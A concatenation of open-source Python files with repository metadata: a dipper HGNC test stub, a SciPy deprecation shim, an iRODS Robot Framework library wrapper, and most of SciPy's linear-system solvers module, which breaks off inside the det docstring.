| blossomica/airmozilla | airmozilla/main/migrations/0013_auto_20160223_1757.py | Python | bsd-3-clause | 1,622 |
#!/usr/bin/env python3
import unittest
import logging
from tests.test_source import SourceTestCase
from dipper.sources.HGNC import HGNC
logging.basicConfig(level=logging.WARNING)
logger = logging.getLogger(__name__)
class HGNCTestCase(SourceTestCase):
def setUp(self):
self.source = HGNC('rdf_graph', True)
self.source.test_ids = self.all_test_ids['gene']
self.source.settestonly(True)
self._setDirToSource()
return
def tearDown(self):
self.source = None
return
if __name__ == '__main__':
unittest.main()
| TomConlin/dipper | tests/test_hgnc.py | Python | bsd-3-clause | 580 |
# This file is not meant for public use and will be removed in SciPy v2.0.0.
# Use the `scipy.io` namespace for importing the functions
# included below.
import warnings
from . import _harwell_boeing
__all__ = [ # noqa: F822
'MalformedHeader', 'hb_read', 'hb_write', 'HBInfo',
'HBFile', 'HBMatrixType', 'FortranFormatParser', 'IntFormat',
'ExpFormat', 'BadFortranFormat'
]
def __dir__():
return __all__
def __getattr__(name):
if name not in __all__:
raise AttributeError(
"scipy.io.harwell_boeing is deprecated and has no attribute "
f"{name}. Try looking in scipy.io instead.")
warnings.warn(f"Please use `{name}` from the `scipy.io` namespace, "
"the `scipy.io.harwell_boeing` namespace is deprecated.",
category=DeprecationWarning, stacklevel=2)
return getattr(_harwell_boeing, name)
| grlee77/scipy | scipy/io/harwell_boeing.py | Python | bsd-3-clause | 892 |
from iRODSLibrary import iRODSLibrary
__version__ = "0.0.4"
class iRODSLibrary(iRODSLibrary):
""" iRODSLibrary is a client keyword library that uses
the python-irodsclient module from iRODS
https://github.com/irods/python-irodsclient
Examples:
| Connect To Grid | iPlant | data.iplantcollaborative.org | ${1247} | jdoe | jdoePassword | tempZone
"""
ROBOT_LIBRARY_SCOPE = 'GLOBAL'
| jerry57/Robotframework-iRODS-Library | src/iRODSLibrary/__init__.py | Python | bsd-3-clause | 422 |
#
# Author: Pearu Peterson, March 2002
#
# w/ additions by Travis Oliphant, March 2002
# and Jake Vanderplas, August 2012
from __future__ import division, print_function, absolute_import
from warnings import warn
import numpy as np
from numpy import atleast_1d, atleast_2d
from .flinalg import get_flinalg_funcs
from .lapack import get_lapack_funcs, _compute_lwork
from .misc import LinAlgError, _datacopied, LinAlgWarning
from .decomp import _asarray_validated
from . import decomp, decomp_svd
from ._solve_toeplitz import levinson
__all__ = ['solve', 'solve_triangular', 'solveh_banded', 'solve_banded',
'solve_toeplitz', 'solve_circulant', 'inv', 'det', 'lstsq',
'pinv', 'pinv2', 'pinvh', 'matrix_balance']
# Linear equations
def _solve_check(n, info, lamch=None, rcond=None):
""" Check arguments during the different steps of the solution phase """
if info < 0:
raise ValueError('LAPACK reported an illegal value in {}-th argument'
'.'.format(-info))
elif 0 < info:
raise LinAlgError('Matrix is singular.')
if lamch is None:
return
E = lamch('E')
if rcond < E:
warn('Ill-conditioned matrix (rcond={:.6g}): '
'result may not be accurate.'.format(rcond),
LinAlgWarning, stacklevel=3)
def solve(a, b, sym_pos=False, lower=False, overwrite_a=False,
overwrite_b=False, debug=None, check_finite=True, assume_a='gen',
transposed=False):
"""
Solves the linear equation set ``a * x = b`` for the unknown ``x``
for square ``a`` matrix.
If the data matrix is known to be a particular type then supplying the
corresponding string to ``assume_a`` key chooses the dedicated solver.
The available options are
=================== ========
generic matrix 'gen'
symmetric 'sym'
hermitian 'her'
positive definite 'pos'
=================== ========
If omitted, ``'gen'`` is the default structure.
The datatype of the arrays define which solver is called regardless
of the values. In other words, even when the complex array entries have
precisely zero imaginary parts, the complex solver will be called based
on the data type of the array.
Parameters
----------
a : (N, N) array_like
Square input data
b : (N, NRHS) array_like
Input data for the right hand side.
sym_pos : bool, optional
Assume `a` is symmetric and positive definite. This key is deprecated
and assume_a = 'pos' keyword is recommended instead. The functionality
is the same. It will be removed in the future.
lower : bool, optional
If True, only the data contained in the lower triangle of `a`. Default
is to use upper triangle. (ignored for ``'gen'``)
overwrite_a : bool, optional
Allow overwriting data in `a` (may enhance performance).
Default is False.
overwrite_b : bool, optional
Allow overwriting data in `b` (may enhance performance).
Default is False.
check_finite : bool, optional
Whether to check that the input matrices contain only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
assume_a : str, optional
Valid entries are explained above.
transposed: bool, optional
If True, ``a^T x = b`` for real matrices, raises `NotImplementedError`
for complex matrices (only for True).
Returns
-------
x : (N, NRHS) ndarray
The solution array.
Raises
------
ValueError
If size mismatches detected or input a is not square.
LinAlgError
If the matrix is singular.
LinAlgWarning
If an ill-conditioned input a is detected.
NotImplementedError
If transposed is True and input a is a complex matrix.
Examples
--------
Given `a` and `b`, solve for `x`:
>>> a = np.array([[3, 2, 0], [1, -1, 0], [0, 5, 1]])
>>> b = np.array([2, 4, -1])
>>> from scipy import linalg
>>> x = linalg.solve(a, b)
>>> x
array([ 2., -2., 9.])
>>> np.dot(a, x) == b
array([ True, True, True], dtype=bool)
Notes
-----
If the input b matrix is a 1D array with N elements, when supplied
together with an NxN input a, it is assumed as a valid column vector
despite the apparent size mismatch. This is compatible with the
numpy.dot() behavior and the returned result is still 1D array.
The generic, symmetric, hermitian and positive definite solutions are
obtained via calling ?GESV, ?SYSV, ?HESV, and ?POSV routines of
LAPACK respectively.
"""
# Flags for 1D or nD right hand side
b_is_1D = False
a1 = atleast_2d(_asarray_validated(a, check_finite=check_finite))
b1 = atleast_1d(_asarray_validated(b, check_finite=check_finite))
n = a1.shape[0]
overwrite_a = overwrite_a or _datacopied(a1, a)
overwrite_b = overwrite_b or _datacopied(b1, b)
if a1.shape[0] != a1.shape[1]:
raise ValueError('Input a needs to be a square matrix.')
if n != b1.shape[0]:
# Last chance to catch 1x1 scalar a and 1D b arrays
if not (n == 1 and b1.size != 0):
raise ValueError('Input b has to have same number of rows as '
'input a')
# accommodate empty arrays
if b1.size == 0:
return np.asfortranarray(b1.copy())
# regularize 1D b arrays to 2D
if b1.ndim == 1:
if n == 1:
b1 = b1[None, :]
else:
b1 = b1[:, None]
b_is_1D = True
# Backwards compatibility - old keyword.
if sym_pos:
assume_a = 'pos'
if assume_a not in ('gen', 'sym', 'her', 'pos'):
raise ValueError('{} is not a recognized matrix structure'
''.format(assume_a))
# Deprecate keyword "debug"
if debug is not None:
warn('Use of the "debug" keyword is deprecated '
'and this keyword will be removed in future '
'versions of SciPy.', DeprecationWarning, stacklevel=2)
# Get the correct lamch function.
# The LAMCH functions only exists for S and D
# So for complex values we have to convert to real/double.
if a1.dtype.char in 'fF': # single precision
lamch = get_lapack_funcs('lamch', dtype='f')
else:
lamch = get_lapack_funcs('lamch', dtype='d')
# Currently we do not have the other forms of the norm calculators
# lansy, lanpo, lanhe.
# However, in any case they only reduce computations slightly...
lange = get_lapack_funcs('lange', (a1,))
# Since the I-norm and 1-norm are the same for symmetric matrices
# we can collect them all in this one call
# Note however, that when issuing 'gen' and form!='none', then
# the I-norm should be used
if transposed:
trans = 1
norm = 'I'
if np.iscomplexobj(a1):
raise NotImplementedError('scipy.linalg.solve can currently '
'not solve a^T x = b or a^H x = b '
'for complex matrices.')
else:
trans = 0
norm = '1'
anorm = lange(norm, a1)
# Generalized case 'gesv'
if assume_a == 'gen':
gecon, getrf, getrs = get_lapack_funcs(('gecon', 'getrf', 'getrs'),
(a1, b1))
lu, ipvt, info = getrf(a1, overwrite_a=overwrite_a)
_solve_check(n, info)
x, info = getrs(lu, ipvt, b1,
trans=trans, overwrite_b=overwrite_b)
_solve_check(n, info)
rcond, info = gecon(lu, anorm, norm=norm)
# Hermitian case 'hesv'
elif assume_a == 'her':
hecon, hesv, hesv_lw = get_lapack_funcs(('hecon', 'hesv',
'hesv_lwork'), (a1, b1))
lwork = _compute_lwork(hesv_lw, n, lower)
lu, ipvt, x, info = hesv(a1, b1, lwork=lwork,
lower=lower,
overwrite_a=overwrite_a,
overwrite_b=overwrite_b)
_solve_check(n, info)
rcond, info = hecon(lu, ipvt, anorm)
# Symmetric case 'sysv'
elif assume_a == 'sym':
sycon, sysv, sysv_lw = get_lapack_funcs(('sycon', 'sysv',
'sysv_lwork'), (a1, b1))
lwork = _compute_lwork(sysv_lw, n, lower)
lu, ipvt, x, info = sysv(a1, b1, lwork=lwork,
lower=lower,
overwrite_a=overwrite_a,
overwrite_b=overwrite_b)
_solve_check(n, info)
rcond, info = sycon(lu, ipvt, anorm)
# Positive definite case 'posv'
else:
pocon, posv = get_lapack_funcs(('pocon', 'posv'),
(a1, b1))
lu, x, info = posv(a1, b1, lower=lower,
overwrite_a=overwrite_a,
overwrite_b=overwrite_b)
_solve_check(n, info)
rcond, info = pocon(lu, anorm)
_solve_check(n, info, lamch, rcond)
if b_is_1D:
x = x.ravel()
return x
def solve_triangular(a, b, trans=0, lower=False, unit_diagonal=False,
overwrite_b=False, debug=None, check_finite=True):
"""
Solve the equation `a x = b` for `x`, assuming a is a triangular matrix.
Parameters
----------
a : (M, M) array_like
A triangular matrix
b : (M,) or (M, N) array_like
Right-hand side matrix in `a x = b`
lower : bool, optional
Use only data contained in the lower triangle of `a`.
Default is to use upper triangle.
trans : {0, 1, 2, 'N', 'T', 'C'}, optional
Type of system to solve:
======== =========
trans system
======== =========
0 or 'N' a x = b
1 or 'T' a^T x = b
2 or 'C' a^H x = b
======== =========
unit_diagonal : bool, optional
If True, diagonal elements of `a` are assumed to be 1 and
will not be referenced.
overwrite_b : bool, optional
Allow overwriting data in `b` (may enhance performance)
check_finite : bool, optional
Whether to check that the input matrices contain only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
Returns
-------
x : (M,) or (M, N) ndarray
Solution to the system `a x = b`. Shape of return matches `b`.
Raises
------
LinAlgError
If `a` is singular
Notes
-----
.. versionadded:: 0.9.0
Examples
--------
Solve the lower triangular system a x = b, where::
[3 0 0 0] [4]
a = [2 1 0 0] b = [2]
[1 0 1 0] [4]
[1 1 1 1] [2]
>>> from scipy.linalg import solve_triangular
>>> a = np.array([[3, 0, 0, 0], [2, 1, 0, 0], [1, 0, 1, 0], [1, 1, 1, 1]])
>>> b = np.array([4, 2, 4, 2])
>>> x = solve_triangular(a, b, lower=True)
>>> x
array([ 1.33333333, -0.66666667, 2.66666667, -1.33333333])
>>> a.dot(x) # Check the result
array([ 4., 2., 4., 2.])
"""
# Deprecate keyword "debug"
if debug is not None:
warn('Use of the "debug" keyword is deprecated '
'and this keyword will be removed in the future '
'versions of SciPy.', DeprecationWarning, stacklevel=2)
a1 = _asarray_validated(a, check_finite=check_finite)
b1 = _asarray_validated(b, check_finite=check_finite)
if len(a1.shape) != 2 or a1.shape[0] != a1.shape[1]:
raise ValueError('expected square matrix')
if a1.shape[0] != b1.shape[0]:
raise ValueError('incompatible dimensions')
overwrite_b = overwrite_b or _datacopied(b1, b)
if debug:
print('solve:overwrite_b=', overwrite_b)
trans = {'N': 0, 'T': 1, 'C': 2}.get(trans, trans)
trtrs, = get_lapack_funcs(('trtrs',), (a1, b1))
x, info = trtrs(a1, b1, overwrite_b=overwrite_b, lower=lower,
trans=trans, unitdiag=unit_diagonal)
if info == 0:
return x
if info > 0:
raise LinAlgError("singular matrix: resolution failed at diagonal %d" %
(info-1))
raise ValueError('illegal value in %d-th argument of internal trtrs' %
(-info))
def solve_banded(l_and_u, ab, b, overwrite_ab=False, overwrite_b=False,
debug=None, check_finite=True):
"""
Solve the equation a x = b for x, assuming a is banded matrix.
The matrix a is stored in `ab` using the matrix diagonal ordered form::
ab[u + i - j, j] == a[i,j]
Example of `ab` (shape of a is (6,6), `u` =1, `l` =2)::
* a01 a12 a23 a34 a45
a00 a11 a22 a33 a44 a55
a10 a21 a32 a43 a54 *
a20 a31 a42 a53 * *
Parameters
----------
(l, u) : (integer, integer)
Number of non-zero lower and upper diagonals
ab : (`l` + `u` + 1, M) array_like
Banded matrix
b : (M,) or (M, K) array_like
Right-hand side
overwrite_ab : bool, optional
Discard data in `ab` (may enhance performance)
overwrite_b : bool, optional
Discard data in `b` (may enhance performance)
check_finite : bool, optional
Whether to check that the input matrices contain only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
Returns
-------
x : (M,) or (M, K) ndarray
The solution to the system a x = b. Returned shape depends on the
shape of `b`.
Examples
--------
Solve the banded system a x = b, where::
[5 2 -1 0 0] [0]
[1 4 2 -1 0] [1]
a = [0 1 3 2 -1] b = [2]
[0 0 1 2 2] [2]
[0 0 0 1 1] [3]
There is one nonzero diagonal below the main diagonal (l = 1), and
two above (u = 2). The diagonal banded form of the matrix is::
[* * -1 -1 -1]
ab = [* 2 2 2 2]
[5 4 3 2 1]
[1 1 1 1 *]
>>> from scipy.linalg import solve_banded
>>> ab = np.array([[0, 0, -1, -1, -1],
... [0, 2, 2, 2, 2],
... [5, 4, 3, 2, 1],
... [1, 1, 1, 1, 0]])
>>> b = np.array([0, 1, 2, 2, 3])
>>> x = solve_banded((1, 2), ab, b)
>>> x
array([-2.37288136, 3.93220339, -4. , 4.3559322 , -1.3559322 ])
"""
# Deprecate keyword "debug"
if debug is not None:
warn('Use of the "debug" keyword is deprecated '
'and this keyword will be removed in the future '
'versions of SciPy.', DeprecationWarning, stacklevel=2)
a1 = _asarray_validated(ab, check_finite=check_finite, as_inexact=True)
b1 = _asarray_validated(b, check_finite=check_finite, as_inexact=True)
# Validate shapes.
if a1.shape[-1] != b1.shape[0]:
raise ValueError("shapes of ab and b are not compatible.")
(nlower, nupper) = l_and_u
if nlower + nupper + 1 != a1.shape[0]:
raise ValueError("invalid values for the number of lower and upper "
"diagonals: l+u+1 (%d) does not equal ab.shape[0] "
"(%d)" % (nlower + nupper + 1, ab.shape[0]))
overwrite_b = overwrite_b or _datacopied(b1, b)
if a1.shape[-1] == 1:
b2 = np.array(b1, copy=(not overwrite_b))
b2 /= a1[1, 0]
return b2
if nlower == nupper == 1:
overwrite_ab = overwrite_ab or _datacopied(a1, ab)
gtsv, = get_lapack_funcs(('gtsv',), (a1, b1))
du = a1[0, 1:]
d = a1[1, :]
dl = a1[2, :-1]
du2, d, du, x, info = gtsv(dl, d, du, b1, overwrite_ab, overwrite_ab,
overwrite_ab, overwrite_b)
else:
gbsv, = get_lapack_funcs(('gbsv',), (a1, b1))
a2 = np.zeros((2*nlower + nupper + 1, a1.shape[1]), dtype=gbsv.dtype)
a2[nlower:, :] = a1
lu, piv, x, info = gbsv(nlower, nupper, a2, b1, overwrite_ab=True,
overwrite_b=overwrite_b)
if info == 0:
return x
if info > 0:
raise LinAlgError("singular matrix")
raise ValueError('illegal value in %d-th argument of internal '
'gbsv/gtsv' % -info)
def solveh_banded(ab, b, overwrite_ab=False, overwrite_b=False, lower=False,
check_finite=True):
"""
Solve equation a x = b. a is Hermitian positive-definite banded matrix.
The matrix a is stored in `ab` either in lower diagonal or upper
diagonal ordered form:
ab[u + i - j, j] == a[i,j] (if upper form; i <= j)
ab[ i - j, j] == a[i,j] (if lower form; i >= j)
Example of `ab` (shape of a is (6, 6), `u` =2)::
upper form:
* * a02 a13 a24 a35
* a01 a12 a23 a34 a45
a00 a11 a22 a33 a44 a55
lower form:
a00 a11 a22 a33 a44 a55
a10 a21 a32 a43 a54 *
a20 a31 a42 a53 * *
Cells marked with * are not used.
Parameters
----------
ab : (`u` + 1, M) array_like
Banded matrix
b : (M,) or (M, K) array_like
Right-hand side
overwrite_ab : bool, optional
Discard data in `ab` (may enhance performance)
overwrite_b : bool, optional
Discard data in `b` (may enhance performance)
lower : bool, optional
Is the matrix in the lower form. (Default is upper form)
check_finite : bool, optional
Whether to check that the input matrices contain only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
Returns
-------
x : (M,) or (M, K) ndarray
The solution to the system a x = b. Shape of return matches shape
of `b`.
Examples
--------
Solve the banded system A x = b, where::
[ 4 2 -1 0 0 0] [1]
[ 2 5 2 -1 0 0] [2]
A = [-1 2 6 2 -1 0] b = [2]
[ 0 -1 2 7 2 -1] [3]
[ 0 0 -1 2 8 2] [3]
[ 0 0 0 -1 2 9] [3]
>>> from scipy.linalg import solveh_banded
`ab` contains the main diagonal and the nonzero diagonals below the
main diagonal. That is, we use the lower form:
>>> ab = np.array([[ 4, 5, 6, 7, 8, 9],
... [ 2, 2, 2, 2, 2, 0],
... [-1, -1, -1, -1, 0, 0]])
>>> b = np.array([1, 2, 2, 3, 3, 3])
>>> x = solveh_banded(ab, b, lower=True)
>>> x
array([ 0.03431373, 0.45938375, 0.05602241, 0.47759104, 0.17577031,
0.34733894])
Solve the Hermitian banded system H x = b, where::
[ 8 2-1j 0 0 ] [ 1 ]
H = [2+1j 5 1j 0 ] b = [1+1j]
[ 0 -1j 9 -2-1j] [1-2j]
[ 0 0 -2+1j 6 ] [ 0 ]
In this example, we put the upper diagonals in the array `hb`:
>>> hb = np.array([[0, 2-1j, 1j, -2-1j],
... [8, 5, 9, 6 ]])
>>> b = np.array([1, 1+1j, 1-2j, 0])
>>> x = solveh_banded(hb, b)
>>> x
array([ 0.07318536-0.02939412j, 0.11877624+0.17696461j,
0.10077984-0.23035393j, -0.00479904-0.09358128j])
"""
a1 = _asarray_validated(ab, check_finite=check_finite)
b1 = _asarray_validated(b, check_finite=check_finite)
# Validate shapes.
if a1.shape[-1] != b1.shape[0]:
raise ValueError("shapes of ab and b are not compatible.")
overwrite_b = overwrite_b or _datacopied(b1, b)
overwrite_ab = overwrite_ab or _datacopied(a1, ab)
if a1.shape[0] == 2:
ptsv, = get_lapack_funcs(('ptsv',), (a1, b1))
if lower:
d = a1[0, :].real
e = a1[1, :-1]
else:
d = a1[1, :].real
e = a1[0, 1:].conj()
d, du, x, info = ptsv(d, e, b1, overwrite_ab, overwrite_ab,
overwrite_b)
else:
pbsv, = get_lapack_funcs(('pbsv',), (a1, b1))
c, x, info = pbsv(a1, b1, lower=lower, overwrite_ab=overwrite_ab,
overwrite_b=overwrite_b)
if info > 0:
raise LinAlgError("%d-th leading minor not positive definite" % info)
if info < 0:
raise ValueError('illegal value in %d-th argument of internal '
'pbsv' % -info)
return x
def solve_toeplitz(c_or_cr, b, check_finite=True):
"""Solve a Toeplitz system using Levinson Recursion
The Toeplitz matrix has constant diagonals, with c as its first column
and r as its first row. If r is not given, ``r == conjugate(c)`` is
assumed.
Parameters
----------
c_or_cr : array_like or tuple of (array_like, array_like)
The vector ``c``, or a tuple of arrays (``c``, ``r``). Whatever the
actual shape of ``c``, it will be converted to a 1-D array. If not
supplied, ``r = conjugate(c)`` is assumed; in this case, if c[0] is
real, the Toeplitz matrix is Hermitian. r[0] is ignored; the first row
of the Toeplitz matrix is ``[c[0], r[1:]]``. Whatever the actual shape
of ``r``, it will be converted to a 1-D array.
b : (M,) or (M, K) array_like
Right-hand side in ``T x = b``.
check_finite : bool, optional
Whether to check that the input matrices contain only finite numbers.
Disabling may give a performance gain, but may result in problems
(result entirely NaNs) if the inputs do contain infinities or NaNs.
Returns
-------
x : (M,) or (M, K) ndarray
The solution to the system ``T x = b``. Shape of return matches shape
of `b`.
See Also
--------
toeplitz : Toeplitz matrix
Notes
-----
The solution is computed using Levinson-Durbin recursion, which is faster
than generic least-squares methods, but can be less numerically stable.
Examples
--------
Solve the Toeplitz system T x = b, where::
[ 1 -1 -2 -3] [1]
T = [ 3 1 -1 -2] b = [2]
[ 6 3 1 -1] [2]
[10 6 3 1] [5]
To specify the Toeplitz matrix, only the first column and the first
row are needed.
>>> c = np.array([1, 3, 6, 10]) # First column of T
>>> r = np.array([1, -1, -2, -3]) # First row of T
>>> b = np.array([1, 2, 2, 5])
>>> from scipy.linalg import solve_toeplitz, toeplitz
>>> x = solve_toeplitz((c, r), b)
>>> x
array([ 1.66666667, -1. , -2.66666667, 2.33333333])
Check the result by creating the full Toeplitz matrix and
multiplying it by `x`. We should get `b`.
>>> T = toeplitz(c, r)
>>> T.dot(x)
array([ 1., 2., 2., 5.])
"""
# If numerical stability of this algorithm is a problem, a future
# developer might consider implementing other O(N^2) Toeplitz solvers,
# such as GKO (https://www.jstor.org/stable/2153371) or Bareiss.
if isinstance(c_or_cr, tuple):
c, r = c_or_cr
c = _asarray_validated(c, check_finite=check_finite).ravel()
r = _asarray_validated(r, check_finite=check_finite).ravel()
else:
c = _asarray_validated(c_or_cr, check_finite=check_finite).ravel()
r = c.conjugate()
# Form a 1D array of values to be used in the matrix, containing a reversed
# copy of r[1:], followed by c.
vals = np.concatenate((r[-1:0:-1], c))
if b is None:
raise ValueError('illegal value, `b` is a required argument')
b = _asarray_validated(b)
if vals.shape[0] != (2*b.shape[0] - 1):
raise ValueError('incompatible dimensions')
if np.iscomplexobj(vals) or np.iscomplexobj(b):
vals = np.asarray(vals, dtype=np.complex128, order='c')
b = np.asarray(b, dtype=np.complex128)
else:
vals = np.asarray(vals, dtype=np.double, order='c')
b = np.asarray(b, dtype=np.double)
if b.ndim == 1:
x, _ = levinson(vals, np.ascontiguousarray(b))
else:
b_shape = b.shape
b = b.reshape(b.shape[0], -1)
x = np.column_stack([levinson(vals, np.ascontiguousarray(b[:, i]))[0]
for i in range(b.shape[1])])
x = x.reshape(*b_shape)
return x
def _get_axis_len(aname, a, axis):
ax = axis
if ax < 0:
ax += a.ndim
if 0 <= ax < a.ndim:
return a.shape[ax]
raise ValueError("'%saxis' entry is out of bounds" % (aname,))
def solve_circulant(c, b, singular='raise', tol=None,
caxis=-1, baxis=0, outaxis=0):
"""Solve C x = b for x, where C is a circulant matrix.
`C` is the circulant matrix associated with the vector `c`.
The system is solved by doing division in Fourier space. The
calculation is::
x = ifft(fft(b) / fft(c))
where `fft` and `ifft` are the fast Fourier transform and its inverse,
respectively. For a large vector `c`, this is *much* faster than
solving the system with the full circulant matrix.
Parameters
----------
c : array_like
The coefficients of the circulant matrix.
b : array_like
Right-hand side matrix in ``a x = b``.
singular : str, optional
This argument controls how a near singular circulant matrix is
handled. If `singular` is "raise" and the circulant matrix is
near singular, a `LinAlgError` is raised. If `singular` is
"lstsq", the least squares solution is returned. Default is "raise".
tol : float, optional
If any eigenvalue of the circulant matrix has an absolute value
that is less than or equal to `tol`, the matrix is considered to be
near singular. If not given, `tol` is set to::
tol = abs_eigs.max() * abs_eigs.size * np.finfo(np.float64).eps
where `abs_eigs` is the array of absolute values of the eigenvalues
of the circulant matrix.
caxis : int
When `c` has dimension greater than 1, it is viewed as a collection
of circulant vectors. In this case, `caxis` is the axis of `c` that
holds the vectors of circulant coefficients.
baxis : int
When `b` has dimension greater than 1, it is viewed as a collection
of vectors. In this case, `baxis` is the axis of `b` that holds the
right-hand side vectors.
outaxis : int
When `c` or `b` are multidimensional, the value returned by
`solve_circulant` is multidimensional. In this case, `outaxis` is
the axis of the result that holds the solution vectors.
Returns
-------
x : ndarray
Solution to the system ``C x = b``.
Raises
------
LinAlgError
If the circulant matrix associated with `c` is near singular.
See Also
--------
circulant : circulant matrix
Notes
-----
For a one-dimensional vector `c` with length `m`, and an array `b`
with shape ``(m, ...)``,
solve_circulant(c, b)
returns the same result as
solve(circulant(c), b)
where `solve` and `circulant` are from `scipy.linalg`.
.. versionadded:: 0.16.0
Examples
--------
>>> from scipy.linalg import solve_circulant, solve, circulant, lstsq
>>> c = np.array([2, 2, 4])
>>> b = np.array([1, 2, 3])
>>> solve_circulant(c, b)
array([ 0.75, -0.25, 0.25])
Compare that result to solving the system with `scipy.linalg.solve`:
>>> solve(circulant(c), b)
array([ 0.75, -0.25, 0.25])
A singular example:
>>> c = np.array([1, 1, 0, 0])
>>> b = np.array([1, 2, 3, 4])
Calling ``solve_circulant(c, b)`` will raise a `LinAlgError`. For the
least square solution, use the option ``singular='lstsq'``:
>>> solve_circulant(c, b, singular='lstsq')
array([ 0.25, 1.25, 2.25, 1.25])
Compare to `scipy.linalg.lstsq`:
>>> x, resid, rnk, s = lstsq(circulant(c), b)
>>> x
array([ 0.25, 1.25, 2.25, 1.25])
A broadcasting example:
Suppose we have the vectors of two circulant matrices stored in an array
with shape (2, 5), and three `b` vectors stored in an array with shape
(3, 5). For example,
>>> c = np.array([[1.5, 2, 3, 0, 0], [1, 1, 4, 3, 2]])
>>> b = np.arange(15).reshape(-1, 5)
We want to solve all combinations of circulant matrices and `b` vectors,
with the result stored in an array with shape (2, 3, 5). When we
disregard the axes of `c` and `b` that hold the vectors of coefficients,
the shapes of the collections are (2,) and (3,), respectively, which are
not compatible for broadcasting. To have a broadcast result with shape
(2, 3), we add a trivial dimension to `c`: ``c[:, np.newaxis, :]`` has
shape (2, 1, 5). The last dimension holds the coefficients of the
circulant matrices, so when we call `solve_circulant`, we can use the
default ``caxis=-1``. The coefficients of the `b` vectors are in the last
dimension of the array `b`, so we use ``baxis=-1``. If we use the
default `outaxis`, the result will have shape (5, 2, 3), so we'll use
``outaxis=-1`` to put the solution vectors in the last dimension.
>>> x = solve_circulant(c[:, np.newaxis, :], b, baxis=-1, outaxis=-1)
>>> x.shape
(2, 3, 5)
>>> np.set_printoptions(precision=3) # For compact output of numbers.
>>> x
array([[[-0.118, 0.22 , 1.277, -0.142, 0.302],
[ 0.651, 0.989, 2.046, 0.627, 1.072],
[ 1.42 , 1.758, 2.816, 1.396, 1.841]],
[[ 0.401, 0.304, 0.694, -0.867, 0.377],
[ 0.856, 0.758, 1.149, -0.412, 0.831],
[ 1.31 , 1.213, 1.603, 0.042, 1.286]]])
Check by solving one pair of `c` and `b` vectors (cf. ``x[1, 1, :]``):
>>> solve_circulant(c[1], b[1, :])
array([ 0.856, 0.758, 1.149, -0.412, 0.831])
"""
c = np.atleast_1d(c)
nc = _get_axis_len("c", c, caxis)
b = np.atleast_1d(b)
nb = _get_axis_len("b", b, baxis)
if nc != nb:
raise ValueError('Incompatible c and b axis lengths')
fc = np.fft.fft(np.rollaxis(c, caxis, c.ndim), axis=-1)
abs_fc = np.abs(fc)
if tol is None:
# This is the same tolerance as used in np.linalg.matrix_rank.
tol = abs_fc.max(axis=-1) * nc * np.finfo(np.float64).eps
if tol.shape != ():
tol.shape = tol.shape + (1,)
else:
tol = np.atleast_1d(tol)
near_zeros = abs_fc <= tol
is_near_singular = np.any(near_zeros)
if is_near_singular:
if singular == 'raise':
raise LinAlgError("near singular circulant matrix.")
else:
# Replace the small values with 1 to avoid errors in the
# division fb/fc below.
fc[near_zeros] = 1
fb = np.fft.fft(np.rollaxis(b, baxis, b.ndim), axis=-1)
q = fb / fc
if is_near_singular:
# `near_zeros` is a boolean array, same shape as `c`, that is
# True where `fc` is (near) zero. `q` is the broadcasted result
# of fb / fc, so to set the values of `q` to 0 where `fc` is near
# zero, we use a mask that is the broadcast result of an array
# of True values shaped like `b` with `near_zeros`.
mask = np.ones_like(b, dtype=bool) & near_zeros
q[mask] = 0
x = np.fft.ifft(q, axis=-1)
if not (np.iscomplexobj(c) or np.iscomplexobj(b)):
x = x.real
if outaxis != -1:
x = np.rollaxis(x, -1, outaxis)
return x
# matrix inversion
def inv(a, overwrite_a=False, check_finite=True):
"""
Compute the inverse of a matrix.
Parameters
----------
a : array_like
Square matrix to be inverted.
overwrite_a : bool, optional
Discard data in `a` (may improve performance). Default is False.
check_finite : bool, optional
Whether to check that the input matrix contains only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
Returns
-------
ainv : ndarray
Inverse of the matrix `a`.
Raises
------
LinAlgError
If `a` is singular.
ValueError
If `a` is not square, or not 2-dimensional.
Examples
--------
>>> from scipy import linalg
>>> a = np.array([[1., 2.], [3., 4.]])
>>> linalg.inv(a)
array([[-2. , 1. ],
[ 1.5, -0.5]])
>>> np.dot(a, linalg.inv(a))
array([[ 1., 0.],
[ 0., 1.]])
"""
a1 = _asarray_validated(a, check_finite=check_finite)
if len(a1.shape) != 2 or a1.shape[0] != a1.shape[1]:
raise ValueError('expected square matrix')
overwrite_a = overwrite_a or _datacopied(a1, a)
# XXX: I found no advantage or disadvantage of using finv.
# finv, = get_flinalg_funcs(('inv',),(a1,))
# if finv is not None:
# a_inv,info = finv(a1,overwrite_a=overwrite_a)
# if info==0:
# return a_inv
# if info>0: raise LinAlgError, "singular matrix"
# if info<0: raise ValueError('illegal value in %d-th argument of '
# 'internal inv.getrf|getri'%(-info))
getrf, getri, getri_lwork = get_lapack_funcs(('getrf', 'getri',
'getri_lwork'),
(a1,))
lu, piv, info = getrf(a1, overwrite_a=overwrite_a)
if info == 0:
lwork = _compute_lwork(getri_lwork, a1.shape[0])
# XXX: the following line fixes curious SEGFAULT when
# benchmarking 500x500 matrix inverse. This seems to
# be a bug in LAPACK ?getri routine because if lwork is
# minimal (when using lwork[0] instead of lwork[1]) then
# all tests pass. Further investigation is required if
# more such SEGFAULTs occur.
lwork = int(1.01 * lwork)
inv_a, info = getri(lu, piv, lwork=lwork, overwrite_lu=1)
if info > 0:
raise LinAlgError("singular matrix")
if info < 0:
raise ValueError('illegal value in %d-th argument of internal '
'getrf|getri' % -info)
return inv_a
# Determinant
def det(a, overwrite_a=False, check_finite=True):
"""
Compute the determinant of a matrix
The determinant of a square matrix is a value derived arithmetically
from the coefficients of the matrix.
The determinant for a 3x3 matrix, for example, is computed as follows::
a b c
d e f = A
g h i
det(A) = a*e*i + b*f*g + c*d*h - c*e*g - b*d*i - a*f*h
Parameters
----------
a : (M, M) array_like
A square matrix.
overwrite_a : bool, optional
Allow overwriting data in a (may enhance performance).
check_finite : bool, optional
Whether to check that the input matrix contains only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
Returns
-------
det : float or complex
Determinant of `a`.
Notes
-----
The determinant is computed via LU factorization, LAPACK routine z/dgetrf.
Examples
--------
